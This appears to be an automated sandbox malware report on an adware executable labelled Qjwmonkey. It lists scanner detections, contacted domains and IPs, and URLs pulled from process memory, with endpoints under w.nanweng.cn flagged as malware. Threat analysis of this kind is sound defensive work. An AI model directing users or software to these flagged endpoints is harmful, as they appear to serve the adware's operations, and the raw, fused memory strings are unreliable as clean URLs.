        SourceDetectionScannerLabelLink
        nv8401986_110422.exe87%VirustotalBrowse
        nv8401986_110422.exe87%ReversingLabsWin32.Adware.Qjwmonkey
        nv8401986_110422.exe100%AviraADWARE/Qjwmonkey.Gen
        nv8401986_110422.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif/M0%Avira URL Cloudsafe
        https://events-sandbox.data.microsoftstart.com/OneCollector/1.0https://browser.events.data.microsoft0%Avira URL Cloudsafe
        http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gif0%Avira URL Cloudsafe
        http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif?45295f866ecde2b90fe5d09c70%Avira URL Cloudsafe
        https://assets.msn.comhttps://assets.msn.cn0%Avira URL Cloudsafe
        http://w.nanweng.cn:80/qy/rq100%Avira URL Cloudmalware
        http://w.nanweng.cn:80/qy/png100%Avira URL Cloudmalware
        https://www.msn.comc0%Avira URL Cloudsafe
        https://browser.events.data.microsoftstart.cn/OneCollector/1.00%Avira URL Cloudsafe
        http://cdn.fengdf.cn/youxi/index_%d_%d.htm0%Avira URL Cloudsafe
        http://w.nanweng.cn/bqd100%Avira URL Cloudmalware
        http://cdn.fengdf.cn/youxi/index_%d_%d.htmThumWndClass/qy/o/qy/rq/qy/rq2procgcp=/qy/gcpcpr=/qy/cprda0%Avira URL Cloudsafe
        https://www.msn.comP0%Avira URL Cloudsafe
        http://w.nanweng.cn/qy/gl1100%Avira URL Cloudmalware
        http://.sq0%Avira URL Cloudsafe
        http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifQ0%Avira URL Cloudsafe
        http://w.nanweng.cn/qy/glf100%Avira URL Cloudmalware
        http://w.nanweng.cn:80/qy/pngsersd100%Avira URL Cloudmalware
        http://w.nanweng.cn/qy/gl100%Avira URL Cloudmalware
        http://w.nanweng.cn/qy/rqh100%Avira URL Cloudmalware
        http://w.nanweng.cn/qy/png100%Avira URL Cloudmalware
        https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/0%Avira URL Cloudsafe
        https://www.msn.0%Avira URL Cloudsafe
        https://c.microsoftstart.com/c.gif0%Avira URL Cloudsafe
        http://w.nanweng.cn:80/qy/lqnrps0sid360softtm1689880905type20uid102e1490f0604c078f675cf9899bc6e6ver6100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        code.jquery.com
        		151.101.194.137
        		truefalse
          		high
          w.nanweng.cn
          		47.103.45.17
          		truefalse
            		unknown
            sb.scorecardresearch.com
            		18.244.18.122
            		truefalse
              		high
              assets.msn.com
              		unknown
              		unknownfalse
                		high
                www.msn.com
                		unknown
                		unknownfalse
                  		high
                  c.msn.com
                  		unknown
                  		unknownfalse
                    		high
                    2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com
                    		unknown
                    		unknownfalse
                      		unknown
                      45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com
                      		unknown
                      		unknownfalse
                        		unknown
                        login.microsoftonline.com
                        		unknown
                        		unknownfalse
                          		high
                          browser.events.data.msn.com
                          		unknown
                          		unknownfalse
                            		high
                            238358d141a1b2850f10e9a50017a441.clo.footprintdns.com
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://sb.scorecardresearch.com/b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=30919B60838E69BC08808E09822668DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                		high
                                https://code.jquery.com/jquery-3.6.3.min.jsfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://browser.events.data.microsoftstart.cn/OneCollector/1.0nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.msn.comcnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.msn.com/id-id/berita/nasional/tentang-kami/ar-BBca8ZEhttps://www.msn.com/it-it/notizie/mnv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://w.nanweng.cn:80/qy/rqnv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://assets.msn.comhttps://assets.msn.cnnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.jsnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, J0K33CCW.htm.0.drfalse
                                      		high
                                      https://code.jquery.com/jquery-3.6.3.min.jsctor/1.0?cors=true&content-type=application/x-json-streamnv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://login.microsoftonline.com/error?code=50058#/wxnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pngnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://assets.msn.com/nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif?45295f866ecde2b90fe5d09c7nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://aefd.nelreports.net/api/report?cat=bingaotaknv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3302728536.000000000E2C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://deff.nelreports.net/api/report?cat=msnnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://cdn.fengdf.cn/youxi/index_%d_%d.htmnv8401986_110422.exefalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://c.msn.com/c.gif?rnd=1735914359600&udc=true&pg.n=startpage&pg.t=hp&pg.c=&pg.p=prime&rf=&tp=htnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3286553261.000000000B6C3000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3278061822.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsjsnv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://deff.nelreports.net/api/reportnv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif/Mnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://github.com/Raicuparta/rai-pal/issues/145y=nv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.msn.com/PV.xmlGQ=MS.News.Web.AdImpressionXnv8401986_110422.exe, 00000000.00000002.3295450038.000000000CB00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://events-sandbox.data.microsoftstart.com/OneCollector/1.0https://browser.events.data.microsoftnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.pngmnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://browser.events.data.msn.com/OneCollector/1.0nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngg)nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://w.nanweng.cn:80/qy/pngnv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://w.nanweng.cn/bqdnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006BFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://www.msn.comnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.000000000083C000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Raicuparta/rai-pal/issues/145(nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.msn.comPnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://github.com/RaicuEnv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.msn.com/?ocid=iehpC:nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.com/Raicuparta/rai-pal/issues/145Wnv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifQnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://w.nanweng.cn:80/qy/pngsersdnv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://chrome.google.com/webstorefnv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://chrome.google.com/webstorenv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive-daily-2.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png)nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://w.nanweng.cn/qy/gl1nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2035873967.00000000040AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://w.nanweng.cn/qy/glnv8401986_110422.exe, 00000000.00000003.2035873967.000000000407F000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://code.jquery.com/jquery-3.6.3.min.jsownlnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/Raicupnv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://drive-daily-1.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/GoogleChrome/chrome-launcher/blob/main/docs/chrome-flags-for-tools.mdsearch[1].htm.0.drfalse
                                                                                                    		high
                                                                                                    https://www.msn.com/?ocid=iehp3.6.3.min.jstandardnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/Env8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016646782.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://drive-daily-5.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.msn.com/nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.msn.com/?ocid=iehp3.6.3.min.jstps://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/lnv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.msn.com/?ocid=iehpnv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3290088545.000000000BBB0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://cdn.fengdf.cn/youxi/index_%d_%d.htmThumWndClass/qy/o/qy/rq/qy/rq2procgcp=/qy/gcpcpr=/qy/cprdanv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refnv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://chromewebstore.google.com/nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://aefd.nelreports.net/api/report?cat=bingrmsnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://drive-preprod.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.msn.com/?ocid=iehp48nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://chrome.google.com/webstore/nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://w.nanweng.cn/qy/rqhnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.jsnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drfalse
                                                                                                                                		high
                                                                                                                                https://assets.msn.com/config/v1/$nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://browser.events.data.msn.com/nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://chrome.google.com/webnv8401986_110422.exe, 00000000.00000003.2017309772.0000000000847000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://.sqnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://msn.com/en-us/news/us/about-us/ar-BBN0NAKInternetnv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYinv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://w.nanweng.cn/qy/glfnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            http://w.nanweng.cn/qy/pngnv8401986_110422.exe, 00000000.00000002.3274337460.000000000082E000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://github.com/Raicuparta/rai-pal/discussions/185Tnv8401986_110422.exe, 00000000.00000003.2041511987.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://assets.msn.com/config/v1/Fnv8401986_110422.exe, 00000000.00000002.3288793430.000000000B921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://sb.scorecardresearch.com/bnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://browser.events.data.msn.com/Unv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.msn.com/?ocid=iehpp/?LinkId=255141/?ocid=iehpnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.msn.com/?ocid=iehpngnv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png7)yxnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.msn.com/?ocid=iehpp0nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/nv8401986_110422.exe, 00000000.00000002.3288793430.000000000B939000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.w3.onv8401986_110422.exe, 00000000.00000002.3299397640.000000000D1F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://c.microsoftstart.com/c.gifnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://chrome.google.com/webstoreo0nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.msn.com/?ocid=iehp/?ocid=iehp...1.pngnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.msn.com/?ocid=iehp3.6.3.min.jsmillis:nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
